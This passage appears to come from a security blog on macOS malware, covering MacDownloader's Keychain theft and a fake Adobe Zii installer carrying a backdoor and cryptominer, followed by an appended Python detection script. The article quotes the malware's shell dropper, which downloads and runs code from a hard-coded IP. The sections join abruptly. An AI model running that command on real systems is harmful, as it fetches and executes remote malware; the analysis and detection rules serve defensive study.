Click to “remove” the adware, and you’ll be prompted to enter your admin password. Once MacDownloader has your password, it tries to establish a connection to a remote server so that it can transmit data.

What kind of data? The contents of your Keychain: usernames, passwords, PINs, credit card numbers, whatever private information a Mac user has stored in it.

In our search for adware and Mac OS malware, we found lots of new adware applications for Mac OS in 2016, 2017 and, recently, 2018. What we have seen at the end of 2017 and in mid/end 2018 is that Mac OS malware is turning to social engineering.

Fortunately, MacDownloader doesn’t appear to pose a major risk to Mac users at the moment. The remote server it tries to connect to has been taken offline, so there’s nothing controlling its activities. It’s quite likely, however, that its authors will fix the flaws that security researchers discovered in its code (and poorly-written dialogues) and release an updated version.

How To Protect Yourself

Instead of trusting a mysterious pop-up window that appears on your Mac, here’s how you should check to see if your Flash player needs an update. Press command and space bar to bring up Spotlight, then type in “Flash Player” and click on the system preference for it. Click on the “Updates” tab, and then click “check now.”

I’ve reached out to both Adobe and Apple for comments on MacDownloader and will update this post with their responses.

Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.

The malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is designed to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe Zii, but it was definitely not the real thing.
As can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative Cloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the logo, too?) The malware installer, however, uses a generic Automator applet icon.

Behavior

Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:

    curl| python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

This script is designed to download and execute a Python script, then download and run an app named sample.app.

The sample.app is simple. It appears to be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of course, but rather it means that the malware was attempting to look like it was doing what the user thought it was intended to do.)

What about the Python script?
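An added example, not code from the original article or from the researchers it describes: a small triage check that flags the three traits visible in the Automator shell script quoted above (a download piped straight into an interpreter, a hard-coded IP address, and a fetched file that is later opened). The rule names and function names are made up for this sketch, and it assumes that an Automator applet keeps its Run Shell Script text under a `COMMAND_STRING` key in its workflow plist.

```python
import plistlib
import re

# The command string quoted in the article; the URL after the first curl
# is missing on the page and is left that way.
PAGE_SCRIPT = ("curl| python - & s=46.226.108.171:80; "
               "curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; "
               "cd sample; cd __MACOSX; open -a sample.app")

RULES = {  # hypothetical rule names, checked in this order
    # Remote content handed straight to an interpreter, never touching disk.
    "download_piped_to_interpreter": re.compile(
        r"\b(?:curl|wget)\b[^;&\n]*\|\s*(?:python[\d.]*|sh|bash|zsh|perl|ruby|osascript)\b"),
    # Hard-coded IPv4 address (optionally with a port) instead of a hostname.
    "raw_ip_host": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?"),
    # A file saved by curl/wget and an `open` command later in the same script.
    "fetch_then_open": re.compile(
        r"\b(?:curl|wget)\b[^;|\n]*\s-(?:o|O|-output)\b.*?(?:^|[;&|]\s*)open\s", re.S),
}

def triage(script):
    """Return {rule_name: matched_text} for every rule that fires."""
    hits = {}
    for name, pattern in RULES.items():
        m = pattern.search(script)
        if m:
            hits[name] = m.group(0).strip()
    return hits

def shell_scripts_in_workflow(plist_bytes):
    """Collect every COMMAND_STRING value found anywhere in a workflow plist."""
    found = []
    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key == "COMMAND_STRING" and isinstance(value, str):
                    found.append(value)
                else:
                    walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)
    walk(plistlib.loads(plist_bytes))
    return found

if __name__ == "__main__":
    for rule, evidence in triage(PAGE_SCRIPT).items():
        print(f"{rule}: {evidence}")
```

The IP rule also matches dotted version strings, so treat a hit as a prompt to read the script rather than as a verdict.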